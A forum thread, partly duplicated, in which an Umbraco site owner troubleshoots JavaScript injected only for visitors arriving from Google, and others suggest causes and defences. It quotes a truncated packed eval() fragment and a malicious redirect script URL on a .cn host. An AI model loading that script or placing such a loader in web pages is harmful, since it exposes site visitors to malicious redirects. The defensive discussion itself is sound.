Hi, I have two Umbraco websites which appear to have been hacked. JavaScript is injected when visiting only certain URLs from Google. When viewing the page source by not coming through Google there is no JavaScript injected.
I have checked all template files, and there is nothing in there.
I have even wiped all code from the pages concerned, so only a blank page is available to be rendered, but the script is still injected when the web request comes from Google.
We have completed virus and malware scans, but all are clear.
Does anyone know what else we could check to find the injected script please?
Thank you in advance.
From what you are saying, it sounds like you are suggesting there could be a bug with the Umbraco you are using.
What version of Umbraco 9 are you using?
When you say hacked do you mean the entire site has been compromised (as in access to the database) or just a page is rendering with content you have no control over?
Have you also tried a different browser?
Is there anyway this can be replicated against a local site?
We are using version 10.2.1. It is only when certain pages are visited from a link on Google.
I can’t recreate the redirect from the website navigation directly.
No I can’t replicate it locally.
I can't say yes for definite but that would be the first action to take.
The Umbraco guys do visit this forum so if it is a security concern they would act on it fast however they too may ask you to update to the latest version in case it's a known vulnerability and already addressed.
It could be worth putting a CSP in place incase the issue is that one of your third party scripts has been compromised and is injecting in the untrusted javascript.
There are limited way's that erronious JavaScript can get into your site.
Umbraco back office user was compromised and that user's permissions have the ability to edit views/partial views / add scripts to pages via the content section. - All back office user accounts should reset their passwords
Hosting environment has been compromised and accessed directly and the views updated from there - speak to your hosting provider and see if they can identify direct access.
Existing 3rd party JavaScript has been compromised - having a CSP would help protect against this (not 100% but pretty good).
CDN/Domain traffic interception is occurring - much harder to detect.
Also, have you confirmed that your site is running on HTTPS with a valid certificate and has things like HSTS enabled which should decrease the ability for someone to browse the site on HTTP and have the traffic intercepted.
Since you know what the offending code is, it would be worth to try searching for it in the production website files. This would give you a hint as to whether it's a hosting environment / umbraco backoffice compromise or some other cause.
If you do find the code inside one or more of your views, for example, there are high chances someone has the ability to access the actual files, either from the Umbraco backoffice or from the hosting environment. So changing backoffice users' passwords and ensuring that the hosting environment doesn't allow any other technologies to be used (like classic asp, php and so forth) can provide you some kind of increased security there.
If it's not in the files, maybe it would be worth to minimize the attack surface by swapping CDN calls to JS files with local calls (get the files on your hosting environment's filesystem and use them from there).
I have searched everywhere, and can't find the code.
Yes I have swapped the CDN calls to all local files in case this was where the issue was coming from, but unfortunately this hasn't resolved it either.
It seems so well hidden. The only additional piece of information I seem to have spotted, it when it is in the process of injecting the script, it briefly has an error saying resource not found.
Do you have any third party JS libraries? Google Tag Manager or anything like that? If your GTM container has been hacked they could have injected it there.
If you view the source of the page is it already thereor appears later..
I would guess something is injecting it in via JS. Try stripping all JS references and add them back one by one.
Umbraco site Hacked
Hi, I have two Umbraco websites which appear to have been hacked. JavaScript is injected when visiting only certain URLs from Google. When viewing the page source by not coming through Google there is no JavaScript injected. I have checked all template files, and there is nothing in there. I have even wiped all code from the pages concerned, so only a blank page is available to be rendered, but the script is still injected when the web request comes from Google. We have completed virus and malware scans, but all are clear. Does anyone know what else we could check to find the injected script please? Thank you in advance.
From what you are saying, it sounds like you are suggesting there could be a bug with the Umbraco you are using.
What version of Umbraco 9 are you using? When you say hacked do you mean the entire site has been compromised (as in access to the database) or just a page is rendering with content you have no control over? Have you also tried a different browser? Is there anyway this can be replicated against a local site?
Thanks
We are using version 10.2.1. It is only when certain pages are visited from a link on Google. I can’t recreate the redirect from the website navigation directly.
No I can’t replicate it locally.
Thank you
We have found this script being sent back: eval(function(p,a,c,k,e,r){e=function(c){return(c
redirecting people to https://br.zmdesf.cn/br.js
Any chance you could update your site to the later version of Umbraco 10? 10.7 being the latest to see if the issue remains?
Not easily, it is a live website. But do you think this would fix it?
Thank you
I can't say yes for definite but that would be the first action to take.
The Umbraco guys do visit this forum so if it is a security concern they would act on it fast however they too may ask you to update to the latest version in case it's a known vulnerability and already addressed.
I have upgraded to version 10.7, but unfortunately this hasn't helped.
Is your site behind a CDN?
Could it be possible that a redirect has been intercepted and then cached in the CDN and is not actually hitting the site at all?
No, unfortunately we don't use a CDN.
It could be worth putting a CSP in place incase the issue is that one of your third party scripts has been compromised and is injecting in the untrusted javascript.
There are limited way's that erronious JavaScript can get into your site.
Also, have you confirmed that your site is running on HTTPS with a valid certificate and has things like HSTS enabled which should decrease the ability for someone to browse the site on HTTP and have the traffic intercepted.
Thanks
Nik
Adding to the previous answer:
Since you know what the offending code is, it would be worth to try searching for it in the production website files. This would give you a hint as to whether it's a hosting environment / umbraco backoffice compromise or some other cause.
If you do find the code inside one or more of your views, for example, there are high chances someone has the ability to access the actual files, either from the Umbraco backoffice or from the hosting environment. So changing backoffice users' passwords and ensuring that the hosting environment doesn't allow any other technologies to be used (like classic asp, php and so forth) can provide you some kind of increased security there.
If it's not in the files, maybe it would be worth to minimize the attack surface by swapping CDN calls to JS files with local calls (get the files on your hosting environment's filesystem and use them from there).
I have searched everywhere, and can't find the code.
Yes I have swapped the CDN calls to all local files in case this was where the issue was coming from, but unfortunately this hasn't resolved it either.
It seems so well hidden. The only additional piece of information I seem to have spotted, it when it is in the process of injecting the script, it briefly has an error saying resource not found.
Thank you so much for all your suggestions.
Hi Katie,
Are you absolutely sure the URLs from Google are on your site, and not a spoofed site with very similar-looking URLs?
Seems a bit strange that only when visiting from Google (of all places) the scripts are injected...
/Chriztian
Yes, it is so odd. This is why I just can't work it out. This is the code they seem to be injecting:
Hi Katie,
If you send me an email I will see how I can help you out!
Kind regards,
Jeffrey
I have also been getting this on an Umbraco 7 site and earlier Umbraco 8 sites. Has anyone worked out how to get rid of it?
The Umbraco 8 site, I have upgraded to 8.18, which seems to have solved it for now.
Do you have any third party JS libraries? Google Tag Manager or anything like that? If your GTM container has been hacked they could have injected it there.
If you view the source of the page is it already thereor appears later..
I would guess something is injecting it in via JS. Try stripping all JS references and add them back one by one.
is working on a reply...